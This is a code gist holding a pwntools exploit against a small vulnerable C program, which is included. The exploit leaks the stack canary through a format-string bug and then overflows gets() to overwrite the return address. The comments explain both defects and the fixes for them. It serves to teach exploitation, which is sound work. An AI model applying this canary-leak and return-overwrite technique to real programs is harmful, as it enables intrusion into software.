@Sinkmanu
Created May 22, 2018 12:55
Exploit with stack guard bypass
from pwn import *
# Target source, kept here for reference. It contains two independent defects
# that this script relies on, and either one being fixed defeats it:
#   1. gets(buffer) / gets(test): unbounded reads into 28- and 12-byte stack
#      arrays (gets() has no length argument; it was removed from C11).
#      Defensive fix: fgets(buf, sizeof buf, stdin).
#   2. printf(buffer): attacker-controlled data used as the format string, so
#      the caller can read stack slots (and more) through conversions like %p.
#      Defensive fix: printf("%s", buffer) or puts(buffer); the compiler flags
#      this pattern with -Wformat -Werror=format-security.
# The stack protector is not broken here; its random value is simply leaked
# through defect 2 and echoed back, which is why SSP alone is not enough once
# an info leak exists.
'''
// File: bypass-canary.c
// $ gcc bypass-canary.c -o bypass-canary
#include <stdio.h>
#include <stdlib.h>
void doRead()
{
char buffer[28];
char test[12];
gets(buffer);
printf(buffer);
printf("\n");
gets(test);
}
void success(){
printf("Canary stack bypassed!!\n");
}
int main(int argc)
{
doRead();
}
'''
# stack canary - %13$p
# Written for Python 2 pwntools: recv*() results are concatenated with str
# literals below, which would raise TypeError (str + bytes) under Python 3.
context(arch = 'amd64', os = 'linux')
elf = ELF("./bypass-canary")
p = process(elf.path)
#p = gdb.debug("./bypass-canary", '''
#break main
#''')
# First gets(buffer) receives a format string; printf(buffer) then prints the
# 13th variadic slot as a pointer. The comment above records that, for this
# build, that slot holds the canary (offset found by the author, not derived here).
p.sendline("%13$p")
# recvuntil keeps the trailing "\n"; int(..., 16) tolerates surrounding
# whitespace and the "0x" prefix, so no strip() is needed.
canary_p = p.recvuntil("\x0a")
log.success("Canary: " + canary_p)
# canary offset = 56
# Re-pack the leaked value little-endian so the overwritten canary compares
# equal in the function epilogue check.
canary = p64(int(canary_p, 16))
#p.sendline(cyclic(56) + canary + "AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# Second line is consumed by gets(test): 56 bytes of filler up to the canary,
# the canary itself, 8 more bytes (presumably the saved frame pointer), then
# the saved return address. 0x4006d1 is a fixed address, which only resolves
# if the binary is built without PIE; it is presumably success() — not
# verifiable from this page. Building with -fPIE -pie would invalidate it,
# since nothing here leaks a code address.
p.sendline(cyclic(56) + canary + "AAAAAAAA"+p64(0x4006d1))
log.success("Recv: " + p.recvline())